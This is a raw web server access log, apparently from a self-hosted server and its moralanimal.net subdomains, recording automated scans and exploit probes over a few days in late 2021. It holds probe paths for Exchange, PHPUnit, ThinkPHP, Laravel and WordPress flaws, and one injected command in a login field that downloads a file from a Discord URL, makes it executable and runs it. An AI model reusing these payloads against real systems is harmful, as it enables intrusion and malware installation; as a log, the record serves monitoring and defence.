"/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.205.14] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Sep/2021:13:46:22 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 185.254.31.134] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [29/Sep/2021:13:46:22 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 185.254.31.134] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [29/Sep/2021:14:33:25 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Sep/2021:15:00:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [29/Sep/2021:15:02:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Sep/2021:15:23:14 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Sep/2021:15:30:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Sep/2021:15:55:02 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Sep/2021:16:44:26 +0000] 400 - - http localhost "-" [Client 94.232.43.33] [Length 154] [Gzip -] "-" "-" [29/Sep/2021:16:44:26 +0000] 400 - - http localhost "-" [Client 94.232.43.33] [Length 154] [Gzip -] "-" "-" [29/Sep/2021:16:46:03 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [29/Sep/2021:17:02:33 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Sep/2021:17:02:33 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Sep/2021:17:02:33 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Sep/2021:17:02:33 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Sep/2021:17:02:33 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Sep/2021:17:02:33 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Sep/2021:17:18:16 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp" [Client 45.155.204.227] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [29/Sep/2021:22:27:47 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Sep/2021:23:15:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.59] [Length 0] [Gzip -] "-" "-" [29/Sep/2021:23:15:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.59] [Length 252] [Gzip -] "-" "-" [29/Sep/2021:23:15:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.59] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [29/Sep/2021:23:56:48 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.129] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Sep/2021:23:58:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.107.251] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [30/Sep/2021:00:21:36 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Sep/2021:00:23:35 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.198.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Sep/2021:00:25:55 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Sep/2021:00:55:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.182] [Length 0] [Gzip -] "-" "-" [30/Sep/2021:01:14:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [30/Sep/2021:03:22:04 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Sep/2021:03:22:04 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Sep/2021:05:03:44 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [30/Sep/2021:05:37:54 +0000] 444 - GET https localhost "/" [Client 109.248.6.101] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [30/Sep/2021:05:49:25 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.201.68] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Sep/2021:05:54:17 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Sep/2021:05:54:18 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Sep/2021:06:04:33 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:06:04:33 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:06:04:38 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:06:04:38 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:06:04:42 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [30/Sep/2021:06:04:43 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:06:04:45 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:06:04:47 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:06:04:48 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:06:04:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:08:43:48 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [30/Sep/2021:09:33:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.198.82] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Sep/2021:10:54:46 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Sep/2021:10:54:46 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Sep/2021:11:22:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.56.83.81] [Length 0] [Gzip -] "curl/7.29.0" "-" [30/Sep/2021:11:46:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 31.44.185.115] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [30/Sep/2021:12:38:53 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.209.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Sep/2021:12:57:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 31.44.185.115] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [30/Sep/2021:12:58:44 +0000] 400 - GET http 64.22.31.253 "/" [Client 3.10.198.180] [Length 252] [Gzip -] "'Cloud mapping experiment. Contact research@pdrlabs.net'" "-" [30/Sep/2021:13:01:35 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [30/Sep/2021:13:41:24 +0000] 444 - GET https api.moralanimal.net "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [30/Sep/2021:13:41:24 +0000] 444 - GET https admin.moralanimal.net "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [30/Sep/2021:13:41:24 +0000] 444 - GET https app.moralanimal.net "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [30/Sep/2021:15:54:19 +0000] 444 - GET https opds.moralanimal.net "/" [Client 167.248.133.115] [Length 0] [Gzip -] "-" "-" [30/Sep/2021:15:54:20 +0000] 400 - GET http opds.moralanimal.net "/" [Client 167.248.133.115] [Length 252] [Gzip -] "-" "-" [30/Sep/2021:15:54:20 +0000] 400 - GET http opds.moralanimal.net "/" [Client 167.248.133.115] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [30/Sep/2021:16:31:18 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:16:31:18 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:16:31:22 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:16:31:24 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:16:31:25 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [30/Sep/2021:16:31:28 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:16:31:29 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:16:31:30 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:16:31:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:16:31:33 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Sep/2021:17:02:37 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Sep/2021:17:02:37 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Sep/2021:17:02:37 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Sep/2021:17:02:37 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Sep/2021:17:02:37 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Sep/2021:17:02:37 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Sep/2021:18:11:52 +0000] 444 - POST https 64.22.31.253 "/actions/authenticate.php?user=test\x22&wget https://cdn.discordapp.com/attachments/893193644419477597/893196149949866045/update -k -O /tmp/koe; chmod 777 /tmp/koe; /tmp/koe klog&\x22&pswd=test" [Client 34.94.8.143] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [30/Sep/2021:19:06:49 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Sep/2021:19:06:50 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Sep/2021:21:36:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.59.1] [Length 0] [Gzip -] "HTTP Banner Detection (https://security.ipip.net)" "-" [30/Sep/2021:22:32:46 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Sep/2021:22:32:47 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Sep/2021:23:20:30 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Sep/2021:23:20:30 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Sep/2021:23:57:27 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.202.205] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Sep/2021:23:59:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 109.74.204.187] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [01/Oct/2021:00:05:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.55.63.228] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0/cc-prepass-https; +info@netcraft.com)" "-" [01/Oct/2021:00:21:54 +0000] 400 - HEAD http localhost "/" [Client 159.65.135.44] [Length 0] [Gzip -] "-" "-" [01/Oct/2021:00:21:54 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 159.65.135.44] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [01/Oct/2021:00:21:55 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 159.65.135.44] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [01/Oct/2021:00:21:55 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 159.65.135.44] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [01/Oct/2021:00:21:56 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 159.65.135.44] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [01/Oct/2021:00:21:56 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 159.65.135.44] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [01/Oct/2021:00:21:57 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 159.65.135.44] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [01/Oct/2021:00:21:58 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 159.65.135.44] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [01/Oct/2021:00:21:58 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 159.65.135.44] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [01/Oct/2021:00:21:59 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 159.65.135.44] [Length 252] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [01/Oct/2021:00:21:59 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 159.65.135.44] [Length 0] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [01/Oct/2021:00:22:00 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 159.65.135.44] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [01/Oct/2021:00:22:00 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 159.65.135.44] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [01/Oct/2021:00:23:35 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.205.35] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Oct/2021:00:24:08 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.162] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Oct/2021:00:26:09 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.193.131] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Oct/2021:00:45:46 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [01/Oct/2021:01:28:17 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:01:28:17 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:01:33:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.173.35.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [01/Oct/2021:01:46:42 +0000] 400 - - http localhost "-" [Client 194.31.168.182] [Length 154] [Gzip -] "-" "-" [01/Oct/2021:02:12:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.92] [Length 0] [Gzip -] "-" "-" [01/Oct/2021:03:27:38 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:03:27:38 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:04:30:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 223.71.167.163] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [01/Oct/2021:05:50:28 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.202.97] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Oct/2021:06:17:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [01/Oct/2021:06:28:25 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [01/Oct/2021:08:23:21 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [01/Oct/2021:08:24:13 